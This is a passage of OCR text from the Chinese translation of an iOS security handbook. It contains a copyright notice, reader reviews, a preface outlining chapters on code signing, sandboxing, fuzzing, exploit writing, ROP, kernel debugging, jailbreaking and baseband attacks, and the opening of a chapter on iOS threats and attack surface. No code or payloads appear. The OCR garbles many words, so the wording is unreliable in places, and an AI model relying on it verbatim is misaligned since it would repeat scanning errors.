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数字 版 权 声 明 


图 灵 社 区 的 电子 书 没有 采用 专 有 客 
户 端 ， 您 可 以 在 任意 设备 上 ， 用 自 
己 喜 欢 的 浏览 器 和 PDF 阅读 器 进行 
阅读 。 

但 您 购买 的 电子 书 仅 供 您 个 人 使 
用 ,未 经 授权 ， 不 得 进行 传播 。 
我 们 愿意 相信 读者 具有 这 样 的 民 知 
和 觉悟 ， 与 我 们 共同 保护 知识 产 
权 。 

如 果 购 买 者 有 侵权 行为 ， 我 们 可 能 
对 该 用 户 实施 包括 但 不 限于 关闭 该 
| 
责任 。 


亚马逊 读者 评论 


“本 书 很 好 地 概述 了 安全 机 制 和 攻防 策 
略 , 介绍 了 当前 的 入 侵 技术 ,不仅 是 初级 编程 
人 员 及 爱好 者 的 入 门 指南 ， 也 是 高 级 用 户 的 重 
要 参考 书 。” 


“本 书 是 企业 用 户 保护 :OS 设备 的 必 读 之 
作 ， 它 用 通俗 易 懂 的 语言 介绍 了 常见 的 iOS 设 
备 入 侵 技 术 及 相应 的 基础 防护 知识 。” 


“本 书 是 完美 的 OS 安全 指南 。6 位 作者 
全 力 介绍 了 不 同 的 安全 主题 ,让 读者 对 iOS 安 
全 模型 和 现今 安全 隐患 有 一 个 良好 的 理解 与 


认识 。” 


“本 书 为 读者 准备 了 开发 漏洞 攻击 程序 及 
越狱 工具 的 相关 知识 与 技术 ,建议 想 要 尝试 开 
发 越狱 工具 或 了 解 其 原理 的 朋友 购买 阅读 。” 


“本 书 深入 探讨 了 iOS 安 全 , 不 仅 介 绍 其 
现状 , 而 且 审视 了 iOS 面 世 以 来 的 受 攻击 情况 

如 果 你 想 对 移动 安全 有 更 多 的 了 解 ， 本 书 
绝对 不 会 让 你 后 悔 。” 
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内 容 提要 


《黑客 攻防 技术 宝典 : iOS 实战 篇 》 全 面 介绍 iOS 的 安全 性 及 工作 原理 ， 揭 示 了 可 能 威胁 iOS 移动 设备 
的 所 有 安全 风险 和 漏洞 攻击 程序 ， 致 力 于 打造 一 个 更 安全 的 平台 。 本 书 内 容 包括 : iOS 设备 和 iOS 安全 架 
构 、iOS 在 企业 中 的 应 用 (企业 管理 和 服务 提供 )、 加 密 敏感 数据 的 处 理 、 代 码 签 名 、 沙 盒 的 相关 机 制 与 处 理 、 
用 模糊 测试 从 默认 iOS 应 用 中 查找 漏洞 、 编 写 漏洞 攻击 程序 、 面 向 返回 的 程序 设计 (ROP)、iOS 内 核 调试 
与 漏洞 审查 、 越 狱 工 作 原理 与 工具 、 基 带 处 理 器 。 

本 书 适合 所 有 希望 了 解 iOS 设备 工作 原理 的 人 学 习 参 考 ， 包 括 致力 于 以 安全 方式 存储 数据 的 应 用 开发 
人 员 、 保 障 iOS 设备 安全 的 企业 管理 人 员 、 从 iOS 中 寻找 瑕 病 的 安全 研究 人 员 ， 以 及 希望 融入 越狱 社区 者 。 
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版 权 声 明 


All Rights Reserved. This translation published under license. Authorized translation from the 
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了 中 


前 


iPhone 已 经 问世 5 年 有 余 , 人 们 大 概 都 已 经 忘 了 当时 的 iPhone 多 么 具有 开创 意义 。 那 时 候 还 没 
有 现在 这 样 的 智能 手机 ， 很 多 手机 也 就 是 用 来 打 打 电话 。 有 些 手 机 中 安装 了 Web 浏览 器 ， 但 并 非 
全 功能 的 ， 只 能 呈现 最 基本 的 网 页 ， 而 且 手 机 屏幕 的 分 辩 率 非常 低 。 好 在 ，iPhone 改变 了 这 一 切 。 

iPhone 的 显示 屏 几 乎 占据 整个 前 面板 ， 有 着 基于 WebKit 的 Web 浏览 器 ， 而 且 其 操作 系统 可 以 
由 用 户 自行 升级 , 不 需要 等 着 运营 商 来 做 这 项 工作 。 再 加 上 存储 照片 、 播 放 音 乐 和 发 送 短信 等 功能 ， 
这 才 是 人 们 真正 想 要 拥有 的 手机 ( 参见 图 1 )。 但 是 ，iPhone 并 不 完美 。 第 一 代 iPhone 数据 传输 速 
度 非 常 慢 ， 不 支持 第 三 方 应 用 ， 而 且 安 全 性 特别 差 ， 不 过 它 却 引领 了 智能 手机 和 平板 电脑 的 革命 。 


Eee 本 
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图 1 众多 消费 者 排队 等 待 购买 第 一 代 Phone 


图 片 来 源 : Mark Kriegsman ( http://www.flickr.com/photos/kriegsman/663122857/ ) 。 
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随 着 第 一 代 让 hone 于 2007 年 问世 ,一 系列 其 他 的 苹果 产品 也 随 之 而 来 ,而 它们 都 运行 着 iOS 。 
当然 ,在 第 一 代 让 hone 等 设备 问世 时 这 个 操作 系统 还 不 叫 i0S。 第 一 代 iPhone 使 用 的 操作 系统 
被 苹果 公司 称 为 OS X， 就 像 其 桌面 版 的 “兄长 ”那样 。 而 在 2008 年 第 二 代 让 hone 出 现时 ， 这 
个 操作 系统 被 称 为 iPhone OS。 那 时 候 它 还 不 能 拥有 iOS 这 个 称呼 ， 因 为 思科 公司 为 路 由 器 设计 
的 操作 系统 先 占 用 了 IOS 这 个 名 称 。 经 过 一 番 交 易 ， 苹 果 公 司 从 2010 年 起 正式 将 其 移动 操作 系 
统 命名 为 iOS。 

紧 随 iPhone 之 后 的 10S 设备 是 iPod Touch。 这 种 设备 基本 上 就 是 个 不 能 打 电 话 不 能 发 短信 的 
iPhone。 其 他 iOS 设备 包括 第 二 代 Apple TV 和 让 ad。 这 些 设备 每 推出 新 的 一 代 ， 都 是 更 快 、 更 
时 晓 、 更 多 功能 的 产品 (如 图 2 所 示 )。 















































图 2 iPhone4( 左 ) 与 iPhone 1 ( 右 ) 的 对 比 





不 过 ,人 们 通常 只 注意 这 些 设备 光鲜 的 外 表 , 很 少 会 去 了 解 它 们 的 内 部 工作 原理 。 数 百 万 人 
每 天 随身 携带 存放 着 他 们 个 人 信息 的 这 些小 设备 ， 但 它们 到 底 安 全 吗 ? 在 各 种 安全 大 会 的 演 
中 ， 在 越狱 社区 里 ， 甚 至 在 研究 人 员 的 个 人 日 志 中 ， 我 们 都 可 以 发 现 关 于 iOS 运行 安全 的 信息 。 
本 书 就 是 要 把 这 些 有 关 iOS 内 部 原理 的 知识 汇总 起 来 。 只 有 让 人 们 都 能 接触 到 这 些 信息 , 才能 让 
个 人 和 企业 有 效 评估 使 用 这 些 设备 的 风险 , 并 了 解 如 何 最 大 限度 地 降低 这 种 风险 。 本 书 甚至 可 以 
提供 一 些 让 设备 本 身 更 安全 与 让 用 户 使 用 起 来 也 更 安全 的 思路 。 


本 书 内 容 


本 书 是 按 iOS 安全 功能 主题 划分 章节 的 , 读者 可 以 用 不 同 的 方式 来 阅读 本 书 。 不 熟悉 这 些 主 
题 或 是 不 想 错 过 任何 内 容 的 读者 可 以 从 头 至 尾 阅读 整 本 书 。 本 书 从 相对 基础 的 章节 开始 , 由浅 入 
深 地 慢 慢 过 渡 到 后 面 较为 复杂 和 深奥 的 章节 。 而 那些 已 经 对 iOS 的 内 部 细节 有 所 了 解 的 读者 可 以 
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跳 过 开头 部 分 ， 直接 阅读 自己 感 兴趣 的 那些 章节 。 每 一 章 的 内 容 基本 上 都 是 相对 独立 的 。 在 提 到 

其 他 章 的 主题 时 ， 我 们 都 会 指明 出 处 。 下 面 来 看 一 下 本 书 中 各 章 的 主要 内 容 。 

口 第 1 章 概述 iOS 设备 和 iOS 安全 架构 。 我 们 在 此 介绍 本 书 其 余部 分 所 要 讨论 的 大 部 分 主 
题 , 最 后 讨论 针对 各 版 iOS 发 动 的 一 些 攻击 , 包括 最 早期 的 一 些 攻击 和 针对 iOS 5 安全 架 
构 的 一 些 攻击 。 

口 第 2 章 讨论 iog 在 企业 中 的 使 用 ， 涉 及 诸如 企业 管理 和 服务 提供 之 类 的 主题 。 此 外 ， 这 

一 章 还 讲述 如 何 为 企业 设备 开发 应 用 ， 包 括 开 发 者 证 书 和 配置 概要 文件 的 工作 原理 。 

口 第 3 章 包含 与 iOS 处 理 加 密 敏感 数据 相关 的 信息 。 这 一 章 概 述 如 何 为 每 台 iOS 设备 得 出 
加 密 密 钥 以 及 如 何 使 用 这 些 加 密 密 钥 、 各 种 等 级 的 加 密 以 及 每 种 等 级 下 都 有 哪些 文件 ， 
讨论 开发 人 员 如 何 利 用 Data Protection API 保护 应 用 中 的 敏感 数据 。 最 后 ， 我 们 还 将 展示 
如 何 通过 亦 力 攻击 破解 密码 ， 以 及 4 位 数字 密码 的 脆弱 性 。 

口 第 4 章 针 对 iOS 深入 介绍 一 种 主要 的 安全 机 制 一 一 代码 签名 。 我 们 将 为 读者 呈现 相关 的 
源 代码 和 逆向 工程 二 进 制 文件 ， 它 们 用 于 确保 只 有 由 受信 任 机 构 签名 的 代码 才能 在 设备 
上 运行 。 这 一 章 还 将 重点 介绍 iOS 代码 签名 机 制 中 的 新 内 容 ， 它 们 为 实现 即时 编译 而 人 允 
许 未 签名 的 代码 以 一 种 严格 受 控 的 方式 运行 。 最 后 , 我 们 介绍 iOS 5 的 早期 版 本 中 出 现 的 
代码 签名 机 制 漏 洞 。 

口 第 5 章 介 绍 iOS 中 涉及 沙 盒 的 机 制 。 我 们 将 展示 iOS 内 核 如 何 支 持 把 钩子 程序 放置 在 关 

键 区 域 ， 讨 论 沙 盒 具 体 用 到 的 钧 子 ， 然 后 举例 说 明 应 用 如 何 完成 自己 的 沙 盒 处 理 ， 并 
述 重要 的 iOS 功能 是 如 何 执行 沙 盒 处 理 的 。 最 后 ， 这 一 章 将 讨论 沙 盒 描述 文件 、 这 些 文 
件 如 何 描述 沙 盒 所 许可 的 功能 ， 以 及 如 何 从 i9S 二 进 制 文件 中 提取 这 些 文件 以 用 于 研究 。 

口 第 6 章 展 示 如 何 利用 模糊 测试 技术 从 默认 的 iogS 应 用 中 找到 漏洞 。 我 们 首先 综合 探讨 模糊 
测试 , 接着 展示 如 何 对 iOS 中 最 大 的 受 攻击 面 MobileSafari 进行 模糊 测试 。 这 一 章 重 点 介绍 
进行 iOS 模糊 测试 的 几 种 不 同方 式 ， 包 括 在 Mac OS X、iOS 模拟 器 以 及 iOS 设备 上 进行 模 
糊 测 试 。 最 后 ， 我 们 还 将 展示 如 何 对 台式 机 上 没有 的 SMS 解析 器 进行 模糊 测试 。 

口 第 7 章 讲述 如 何 利 用 第 6 章 介绍 的 技术 找到 漏洞 ， 并 将 其 转换 为 有 效 的 漏洞 攻击 程序 。 
我 们 将 详细 分 析 iOS 的 堆 管理 系统 ， 并 说 明 如 何 利 用 “ 堆 风 水 ”技术 操控 堆 内 存 。 然 后 ， 
这 一 章 讨论 漏洞 攻击 程序 开发 中 的 一 个 主要 障碍 一 一 地 址 空间 布局 随机 化 (ASLR )。 

口 第 8 章 进 一 步 向 大 家 展示 在 控制 进程 后 可 以 做 些 什么 。 在 简要 介绍 iOS 设备 中 使 用 的 
ARM 架构 后 , 我 们 就 转 而 介绍 面向 返回 的 程序 设计 (ROP )。 这 里 将 向 大 家 介绍 如 何 手工 




























































































创建 和 自动 生成 ROP 有 效 载荷 ， 还 将 给 出 一 些 ROP 有 效 载 荷 的 例子 。 

口 第 9 章 从 用 户 空间 转 和 信 内核。 在 介绍 一 些 内 核 基础 知识 后 ， 我 们 接着 描述 如 何 调试 iOS 
内 核 从 而 监控 其 动态 。 这 一 章 还 将 展示 如 何 对 内 核 进行 漏洞 审查 以 及 如 何 利用 找到 的 各 
种 漏洞 。 

口 第 10 章 介绍 越狱 。 首 先 ， 这 一 章 讲述 有 关 越 狱 工作 原理 的 基础 知识 ， 接 着 详细 描述 不 同 
类 型 的 越狱 工具 ， 然 后 概述 越狱 工具 所 需 的 不 同 组 成 部 分 ， 包 括 对 文件 系统 的 修改 、 已 
安装 的 守护 进程 、 激 活 ， 最 后 还 将 通 览 越狱 利用 的 所 有 内 核 补丁 。 
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口 第 11 章 介绍 很 多 iOS 设备 中 都 有 的 男 一 个 处 理 带 一 一 基带 处 理 带 。 我 们 将 展示 如 何 设置 
与 基带 进行 交互 的 工具 ， 并 介绍 从 过 去 到 现在 iOS 设备 的 基带 中 都 使 用 了 哪些 实时 操作 
系统 ， 然 后 说 明 如 何 对 基带 操作 系统 进行 审计 ， 还 给 出 了 一 些 漏洞 示例 。 最 后 ， 这 一 章 
还 将 描述 一 些 可 以 在 基带 操 作 系 统 上 运行 的 有 效 载 集 。 


读者 对 象 


本 书 是 为 所 有 希望 了 解 iOS 设备 工作 原理 的 人 所 写 的 。 他 们 可 以 是 希望 融入 越狱 社区 的 人 ， 
也 可 以 是 试图 了 解 如 何以 安全 方式 存储 数据 的 应 用 开发 人 员 , 还 可 以 是 想 要 了 解 如 何 保障 iOS 设 
备 安全 的 企业 管理 人 员 ， 或 者 尝试 从 i0S 中 寻找 瑕 症 的 安全 研究 人 员 。 

这 些 目标 读者 几乎 都 应 该 阅读 和 理解 本 书 前 面 的 章节 。 虽 然后 面 的 章节 也 都 试 着 从 基础 知识 
开始 介绍 , 但 是 理解 这 些 内 容 至 少 能 熟悉 一 些 基本 套路 ， 比 方 说 如 何 使 用 调试 顺和 如 何 阅读 代码 
清单 等 。 


所 需 工具 


如 果 大 家 只 想 对 iOS 的 工作 原理 有 个 初步 的 了 解 ， 本 书 完全 可 以 满足 需要 。 不 过 , 为 了 掌握 
本 书 的 绝 大 部 分 内 容 , 我 们 希望 大 家 参照 书 中 示例 在 自己 的 i0S 设备 上 进行 操作 。 这 样 的 话 , 大 
家 就 至 少 需要 一 部 iOS 设备 。 为 了 真正 掌握 这 些 例子 ,大 家 需要 为 iOS 设备 越狱 。 此 外 ， 虽 然 有 
可 能 为 其 他 平台 凑 齐 一 套 能 起 作用 的 工具 , 但 是 为 了 使 用 Xcode 编译 示例 程序 , 大 家 最 好 有 一 台 
运行 Mac OS X 的 计算 机 。 


配套 网 站 


本 书 配套 网 站 www.wiley.com/go/ioshackershandbook 中 有 本 书 的 所 有 代码 " ,因此 大 家 不 需要 
自己 一 行 一 行 敲 代码 。 此 外 ， 对 于 书 中 提 到 的 10S 特有 的 工具 ， 只 要 有 可 能 我 们 就 都 会 收录 在 该 
网 站 上 。 本 书 勘 误 也 可 在 本 网 站 上 查询 ， 如 果 大 家 发 现 本 书 的 错漏 之 处 ， 还 望 不 音 赐教 。 


祝贺 大 家 

我 们 喜爱 自己 的 iOS 设 备 , 我 们 都 是 果 粉 。 不 过 , 要 是 攻击 者 不 能 从 中 窃取 个 人 信息 的 话 , 我 
们 会 更 喜欢 这 些 设备 。 尽管 阅读 本 书 这 样 的 书籍 没 法 让 大 家 阻止 所 有 针对 iOS 的 攻击 , 但 只 有 越 来 
越 多 的 人 了 解 iOS 的 安全 性 及 其 工作 原理 ,iOS 才 可 能 成 为 一 个 更 安全 的 平台 。 请 大 家 准备 好 , 我 
们 马上 就 要 探索 iOS 安全 了 ， 而 且 要 努力 让 它 变 得 更 安 人 全。 毕竟， 有 所 了 解 就 等 于 成 功 了 一 半 。 


























































































































Q@ 本 书 源 代码 也 可 在 图 灵 社 区 本 书 网 页 ( http://www.ituring.com.cn/book/1068 ) 免费 注册 下 载 。 一 一 编者 注 
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iOS 安 全 基础 知识 








如 果 你 也 像 我 们 一 样 ， 那么 只 要 拿 到 新 设备 就 会 想 要 了 解 它 的 安全 性 。 这 里 的 “设备 ”当然 
也 包括 iPhone。 它 不 再 只 是 带 有 小 型 Web 浏 览 器 的 手机 ， 与 老式 手机 相 比 ， 它 更 像 是 计算 机 。 当 
然 , 这 些 ( 以 及 将 来 的 ) 设 备 可 能 存在 与 台式 机 中 相似 的 安全 问题 。 为 了 避免 这 些 设备 受到 危害 ， 
苹果 公司 为 它们 内 置 了 怎样 的 预防 措施 和 安全 机 制 呢 ? 我 们 眼前 是 一 个 开启 计算 领域 全 新 分 支 
的 机 会 。 安 全 性 对 这 些 新 兴 智 能 设备 来 说 有 多 重要 呢 ? 

本 章 会 就 OS 设备 回答 这 些 问 题 ,首先 , 我 们 要 看 看 各 种 OS 设备 上 使 用 的 硬件 , 然后 介绍 iOS 
5 的 安全 架构 。 重 点 讲 一 讲 现 有 设备 为 了 防范 恶意 软件 攻击 和 攻击 者 利用 漏洞 所 内 藤 的 多 层 防御 
手段 。 接 着 ,介绍 一 些 已 经 发 生 的 针对 iOS 设 备 的 攻击 ， 从 而 说 明 这 些 防御 手段 在 现实 世界 中 是 
如 何 起 效 ( 或 失效 ) 的 。 还 将 按照 时 间 先 后 顺序 , 介绍 从 最 早 的 让 hone 到 iOS 5 设备 受到 的 各 种 攻 
击 。 阅读 过 程 中 , 大 家 会 看 到 iOS 设 备 的 安全 性 有 了 多 大 的 提高 。 最 初版 本 的 iOS 几 乎 没有 安全 性 
可 言 ， 但 iOS 5 相对 而 言 则 既 强 大 又 可 靠 。 


1.1 iOS 硬件 /设备 的 类 型 


几 年 来 ，iOS 一 直 在 发 展 ， 各 种 苹果 设备 中 的 硬件 也 不 断 推陈出新 。 随 着 智能 手机 和 平板 
脑 的 普及 ， 人 们 都 希望 拥有 一 台 强 大 的 计算 设备 。 从 某 种 意义 上 讲 ， 他 们 期 望 自己 口袋 里 装着 的 
是 一 台电 脑 。 

iPad 的 问世 就 是 在 这 一 方向 上 迈 出 的 第 一 步 。 第 一 代 iPad 使 用 了 ARM Cortex-A8 架 构 的 CPU ， 
它 的 速度 大 约 是 第 一 代 iPhone 所 使 用 CPU 速度 的 两 倍 。 

iPad 2 和 iPhone 4S 则 是 男 一 个 巨大 跨越 。 它 们 都 使 用 了 ARM Cortex-A9 架 构 的 双核 处 理 
髓 ， 就 CPU 运算 的 速度 而 言 ， 要 比 A8 架 构 的 处 理 器 快 20%。 更 惊人 的 是 ，A9 的 GPU 要 比 A8 的 
快 9 倍 。 

从 安全 的 角度 看 , 硬件 上 差异 最 大 的 是 iPhone 3GS 和 iPad 2 。 iPhone 3GS 是 第 一 种 支持 Thumb2 
旨 令 集 的 设备 。 这 种 新 型 指令 集 改 变 了 创建 ROP 有 效 载荷 的 方式 。 之 前 设备 中 出 现 的 代码 序列 在 
iPhone 3GS 中 突然 发 生 了 改变 。 

另 一 方面 ,iPad 2 使 用 了 双核 处 理 器 , 它 让 iOS 的 分 配 程序 可 以 全 力 运行 。 这 样 就 对 漏洞 攻击 
的 构造 带 来 了 巨大 影响 ， 因 为 漏洞 攻击 在 多 处 理 器 环境 下 的 可 靠 性 要 弱 很 多 。 


















































虹 













































































图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 








2 第 1 章 iOS 安全 基础 知识 





男 一 项 与 安全 相关 的 硬件 是 车 融 , 其实, 在 大 多 数 国家 ,苹果 公 司 的 设备 都 是 与 运营 商 绑 定 
(锁定 ) 的 。 

为 了 解锁 iPhone， 多 数 漏 洞 攻击 都 会 利用 手机 基带 部 件 的 漏洞 。 之 前 的 几 代 iPhone 一 直 使 用 
英 飞 凌 公 司 的 基带 固件 。 而 CDMA 版 本 的 iPhone 4 以 及 各 版 本 的 iPhone 4S 转 为 使 用 高 通 公司 的 基 
带 固件 。 

已 经 公开 的 若干 种 漏洞 攻击 都 是 针对 英 飞 凌 固 件 的 ， 但 针对 高 通 固件 的 漏洞 攻击 尚未 出 现 。 


1.2 ”苹果 公司 如 何 保护 App Store 


iOS 设 备 之 所 以 如 此 了 不 起 ， 其 中 一 个 原因 就 是 它们 可 以 运行 丰富 多 彩 的 应 用 ; 用 户 可 以 在 
苹果 的 App Store 上 找到 这 些 应 用 。App Store 上 至 少 有 50 万 种 应 用 ， 总 下 载 次 数 已 经 超过 了 180 亿 
次 (如 图 1-1 所 示 )。 












































图 1-1 用 户 眼 中 的 App Store 


iOS 的 应 用 是 利用 Xcode 和 iOS SDK 在 Mac OS X 计 算 机 上 开发 的 。 所 构建 的 应 用 可 以 在 iOS 
模拟 器 上 运行 , 也 可 以 在 真实 的 OS 设备 上 进行 测试 。 然后 ,就 可 以 将 开发 出 的 应 用 发 送 给 苹果 
公司 进行 审查 。 如 果 获 得 批准 ， 这 些 应 用 就 会 被 签 上 苹果 的 私 钥 ， 并 被 推送 到 App Store 供 用 户 
下 载 。iOS 的 应 用 必须 得 到 受信 任 一 方 ( 比如 苹果 公司 ) 的 签名 ， 否则 iOS 中 的 强制 性 代码 签名 
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(Mandatory Code-Signing ) 需求 会 让 这 些 应 用 无 法 在 设备 上 运行 ( 详 见 第 4 章 )。 企业 也 可 以 利 
用 类 似 的 系统 向 雇员 分 发 应 用 ， 不 过 雇员 的 手机 必须 经 过 配置 ， 才 能 接受 由 该 企业 和 苹果 公司 
签名 的 应 用 。 

当然 ,一旦 用 户 向 iOS 设 备 下 载 了 新 应 用 ， 就 为 恶意 软件 提供 了 可 乘 之 机 。 苹 果 公司 已 经 试 
着 用 代码 签名 机 制 和 App Store 的 审查 流程 来 降低 这 种 风险 。 除 此 之 外 , 来 源 于 App Store 的 应 用 会 
以 较 低 级 别 的 权限 运行 在 沙 盒 中 , 这 种 方式 可 以 降低 它们 的 破坏 性 。 大 家 很 快 就 能 看 到 更 多 与 此 
有 关 的 内 容 。 


1.3 理解 安全 威胁 


本 书 介 绍 iOS 安 全 机 制 ， 从 它 如 何 起 效 以 及 如 何 攻 破 这 种 机 制 进行 探讨 。 要 全 面 理解 苹果 公 
司 在 保障 其 产品 安全 方面 所 采取 的 措施 ， 首 先 要 知道 这 些 设备 可 能 面 对 的 各 种 威胁 。 

总 体 来 看 ， 很 多 桌面 电脑 所 但 受 的 攻击 同样 会 发 生 在 iOS 设 备 上 。 这 些 攻击 可 分 为 两 大 类 : 
恶意 软件 和 漏洞 攻击 。 恶 意 软件 在 个 人 电脑 中 已 经 出 现 几 十 年 了 ,而 且 正 成 为 移动 设备 的 一 大 威 
胁 。 总 的 来 说 ， 亚 意 软件 就 是 那些 安装 后 一 旦 运行 就 会 “做 坏事 ”的 软件 。 亚 意 软 件 可 能 与 用 户 
需要 的 软件 捆绑 在 一 起 , 也 可 能 伪装 成 用 户 想 要 的 软件 。 不 管 哪 种 情况 , 用 户 都 会 下 载 和 安装 这 
些 恶 意 软 件 , 而 这 些 恶意 软件 在 执行 时 会 干 一 些 坏事 , 包括 发 送 电子 邮件 、 人 允许 攻击 者 远程 访问 、 
安装 按键 记录 器 ， 等 等 。 所 有 通用 计算 设备 或 多 或 少 都 会 受到 恶意 软件 的 威胁 。 电 脑 就 是 用 来 运 
行 软 件 的 , 用 户 让 它们 做 什么 , 它们 就 会 做 什么 。 就 算 用 户 要 求 它们 运行 一 些 恶 意 的 内 容 ， 这些 
计算 设备 也 会 欣然 接受 。 电 脑 没 什么 真正 的 漏洞 ， 它 只 是 不 知道 该 运行 什么 程序 , 不 该 运行 什么 
程序 。 保 护 设备 不 受 恶 意 软 件 危 害 的 常规 方式 是 使 用 杀毒 软件 。 杀 毒 软 件 的 工作 就 是 确定 哪些 软 
件 是 安全 的 ， 哪 些 是 不 安全 的 。 

另 一 方面 , 漏洞 攻击 则 利用 了 设备 中 软件 的 底层 漏洞 运行 其 代码 。 用 户 可 能 只 是 在 浏览 网 页 、 
阅读 电子 邮件 ， 或 根本 什么 都 没 做 ， 突 然 间 一 些 亚 意 代 码 ( 可 能 是 以 网 页 、 电 子 邮 件 或 短信 等 形 
式 ) 就 会 利用 某 个 漏洞 在 设备 上 运行 代码 。 这 种 攻击 有 时 称 为 下 载 驱动 攻击 (drive-by-download )， 
因为 与 恶意 软件 不 同 的 是 , 用户 一 般 会 是 无 谱 的 受害 者 ,他们 并 没有 试图 安装 任何 代码 ， 只 不 过 
是 要 使 用 自己 的 设备 而 已 ! 漏洞 攻击 可 能 在 受 影响 的 进程 内 部 运行 某 些 代 码 , 或 者 下 载 、 安 装 并 
运行 某 些 软 件 。 受 害 的 用 户 可 能 不 知道 一 些 不 同 寻 常 的 事 已 经 发 生 了 。 

这 样 的 漏洞 攻击 要 求 具备 两 个 条 件 。 第 一 个 条 件 是 设备 上 安装 的 软件 有 瑕 症 或 漏洞 。 第 二 个 
条 件 是 攻击 者 有 办 法 利用 这 一 漏洞 让 其 控制 的 代码 在 设备 上 运行 。 针对 这 两 个 条 件 , 预防 措施 也 
有 两 种 。 第 一 就 是 加 大 找 出 漏洞 的 难度 。 这 可 能 意味 着 将 更 少 的 代码 暴露 给 攻击 者 ( 减 小 受 攻击 
面 ), 或 是 尽 可 能 清理 并 删除 代码 中 的 瑕 辛 。 这 一 方法 的 问题 在 于 某 些 代 码 肯 定 要 一 直 暴 露 给 攻 
击 者 ， 否 则 设备 就 没 法 与 外 界 交 互 。 此 外 ， 找 出 次 藏 在 海量 代码 中 的 所 有 (或 者 说 大 多 数 ) 漏洞 
是 很 难 做 到 的 。 如 果 很 容易 的 话 ， 就 不 用 写 书 ， 甚 至 也 不 用 越 什么 狱 了 ! 

第 二 种 预防 漏洞 攻击 的 方式 就 是 加 大 攻击 者 通过 漏洞 执行 恶意 代码 的 难度 。 这 涉及 大 量 的 技 
术 问 题 ， 比 如 我 们 在 全 书 中 都 要 讨论 的 数据 执行 保护 与 内 存 随机 化 (memory randomization )。 顺 
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着 这 条 思路 ， 退 一 万 步 讲 ， 就 算 攻击 者 最 终 在 代码 中 找到 了 bug， 并 让 恶意 代码 运行 起 来 ， 大 家 
至 少 可 以 把 恶意 代码 可 能 造成 的 损害 降 到 最 低 。 这 需要 利用 权限 分 离 或 沙 盒 让 某 些 流 程 无 法 接触 
敏感 数据 。 例 如 ，Web 浏 览 器 或 许 并 不 需要 制作 视频 或 发 送 短 信和 的 功能 。 

到 目前 为 止 , 我 们 一 直 在 围绕 所 有 设备 共同 面临 的 安全 威胁 展开 讨论 。 接 下 来 , 我们 说 一 说 
针对 iOS 设 备 的 攻击 与 针对 个 人 电脑 的 攻击 有 什么 区 别 。 当 然 ， 这 些 攻击 在 很 多 方面 是 非常 相似 
的 。iOS 就 相当 于 精简 了 的 Mac OSX， 因 此 这 两 者 之 间 存 在 很 多 共同 或 至 少 是 非常 类 似 的 漏洞 和 
攻击 。 差 异 的 确 存在 ,不 过 基本 上 可 以 归结 为 受 攻击 面 的 区 别 。 受 攻击 面 是 指 攻击 者 可 以 访问 而 
且 会 处 理 攻 击 者 所 提供 输入 的 那 部 分 代码 。 

从 某 种 角度 上 讲 ，iOS 设 备 的 受 攻击 面 要 比 相应 的 Mac OS X 台 式 机 小 。 比 如 ，iOS 上 就 没有 
安装 iChat 这 样 的 应 用 ， 而 QuickTime 之 类 应 用 的 功能 也 大 大 地 简化 了 。 类 似 地 ，MobileSafari 不 支 
持 Safari 浏 览 器 可 以 解析 的 一 些 文件 类 型 。 因此, 我 们 可 以 说 iOS 的 受 攻击 面 更 小 。 从 男 一 方面 来 
看 ， 某 些 功 能 只 出 现在 iOS 设 备 上 ,特别 是 只 出 现在 iPhone 上 ， 比 方 说 短信 功能 。iPhone 可 以 解析 
短信 ， 但 Mac OS X 中 没有 对 应 的 代码 ， 这 说 明 在 某 种 意义 上 iOS 的 受 攻 击 面 又 更 大 。 而 让 hone 基 
带 处 理 器 上 运行 的 代码 也 会 扩大 iOS 的 受 攻击 面 。 我 们 将 在 第 6 章 和 第 12 章 中 分 别 讨论 这 两 种 iOS 
特有 的 攻击 途径 。 


1.4 理解 iOS 的 安全 架构 


大 家 可 以 想象 一 些 针 对 iOS 设 备 的 恼人 攻击 ， 本 节 就 要 讨论 iOS 设 备 如 何 抵御 这 些 类 型 的 攻 
击 。 这 里 要 描述 iOS 5， 正如 大 家 将 要 看 到 的 , 这 是 种 相当 安全 的 系统 。1.5 节 将 介绍 iOS 是 如 何 一 
路 演变 而 来 的 ， 这 是 段 有 点 坎坷 的 发 展 历程 。 


1.4.1 更 小 的 受 攻击 面 


受 攻 击 面 是 指 处 理 攻 击 者 所 提供 输入 的 代码 。 就 算 苹果 公司 的 某 些 代码 中 存在 漏洞 ， 如果 攻 
击 者 没 法 接触 这 些 代码 ， 或 者 苹果 公司 根本 不 会 在 iOS 中 包含 这 些 代码 ， 那 么 攻击 者 就 没 法 针对 
这 些 漏 洞开 展 攻击 。 因 此 ， 关 键 的 做 法 就 是 尽 可 能 降低 攻击 者 可 以 访问 (尤其 是 可 以 远程 访问 ) 
的 代码 量 。 

苹果 公司 采取 了 各 种 可 能 的 措施 ， 相 对 于 Mac OSX ( 或 其 他 智能 手机 ) 减 小 了 iOS 的 受 攻击 
面 。 例 如 ,不管 用户 喜 不 喜欢 ，iOS 都 是 不 支持 Java 和 Flash 的 。 这 两 种 应 用 的 安全 问题 由 来 已 久 ， 
所 以 不 含 它们 就 使 得 攻击 者 更 难 找到 可 利用 的 漏洞 。 还 有 ，iOS 不 能 处 理 某 些 Mac OS X 可 以 处 理 
的 文件 ， 比 方 说 ,psd 文件 。Safari 能 够 处 理 这 一 文件 类 型 ， 但 MobileSafari 就 不 行 ， 重 要 的 是 ， 没 
人 会 注意 到 MobileSafari 不 支持 这 种 不 常用 的 文件 格式 。 此 外 ， 苹 果 公 司 自 有 的 .mov 格 式 也 只 被 
iOS 部 分 支持 ， 因 此 很 多 可 以 在 Mac OS X 上 播放 的 .mov 文 件 在 iOS 上 无 法 播放 。 最 后 要 说 的 是 ， 
虽然 ijOS 原 生 支 持 .pdf 文 件 ,但 只 是 解析 该 文件 格式 的 部 分 特性 。 再 来 看 看 与 之 有 关 的 一 些 数据 ， 
Charlie Miller 曾 用 一 些 模糊 的 文件 来 测试 Preview ( Mac OS X 系 统 自 带 的 PDF 阅读 器 )， 结 果 引 起 
了 100 多 个 错误 。 而 他 在 用 iOS 测 试 相同 的 文件 时 ， 只 有 和 约 7% 的 文件 在 iOS 中 引发 了 问题 。 这 意味 
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着 通过 减少 iOS 能 够 处 理 的 PDF 特性 ， 苹 果 公 司 减少 了 这 种 情况 下 90% 的 潜在 安全 漏洞 。 瑕 症 越 
少 ， 攻 击 者 发 动 漏洞 攻击 的 机 会 就 越 小 。 


1.4.2 ”精简 过 的 iOS 





